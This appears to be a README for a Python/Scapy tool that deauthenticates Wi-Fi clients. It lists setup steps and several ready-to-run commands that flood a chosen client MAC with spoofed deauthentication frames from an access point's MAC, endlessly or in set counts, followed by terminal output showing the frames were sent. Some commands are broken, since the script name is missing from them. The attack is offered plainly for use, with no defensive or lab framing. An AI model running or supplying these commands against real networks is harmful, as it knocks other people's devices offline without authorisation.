Script to deauthenticate Wi-Fi connections.
- you can use Python virtualenv
- Python3.x is needed
- Wi-Fi interface must be in "Monitor Mode" (you can read here how to do)
- root rights required (or via sudo)
# install needed packages
$ sudo apt install python3-pip python3-venv
# or
$ sudo pip3 install virtualenv
# create and change into Project directory
$ mkdir -p ~/Projects/WifiDeauth && cd ~/Projects/WifiDeauth
# create virtualenv
$ virtualenv -p python3 venv
# or
$ python3 -m venv venv
# activate virtualenv
$ . venv/bin/activate
# install requirements
(venv) $ pip install -r requirements.txt
# or
(venv) $ pip install scapy
# list packages (optional)
(venv) $ pip freeze
# make file executable
(venv) $ chmod u+x
just run it...
# show help (optional)
(venv) $ sudo venv/bin/python ./ --help
# start sending deauth packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 100ms infinite
(venv) $ sudo venv/bin/python ./ wlan1 '55:67:51:c3:2c:b4' '80:30:dc:c2:dd:62'
# start sending deauth packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 100ms infinite
(venv) $ sudo venv/bin/python ./ wlan1 '55:67:51:c3:2c:b4' '80:30:dc:c2:dd:62' -n 0
# start sending deauth packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 200ms infinite
(venv) $ sudo venv/bin/python ./ wlan1 '55:67:51:c3:2c:b4' '80:30:dc:c2:dd:62' -i '0.2'
# start sending deauth 30 packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 100ms
(venv) $ sudo venv/bin/python ./ wlan1 '55:67:51:c3:2c:b4' '80:30:dc:c2:dd:62' -n 30
# start sending deauth 50 packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 300ms
(venv) $ sudo venv/bin/python ./ wlan1 '55:67:51:c3:2c:b4' '80:30:dc:c2:dd:62' -n 50 -i '0.3'
to interrupt press [CTRL + c]
some example from my terminal...
Sending 50 frames every 0.3s to 55:67:51:c3:2c:b4 from 80:30:dc:c2:dd:62
Sent 50 packets.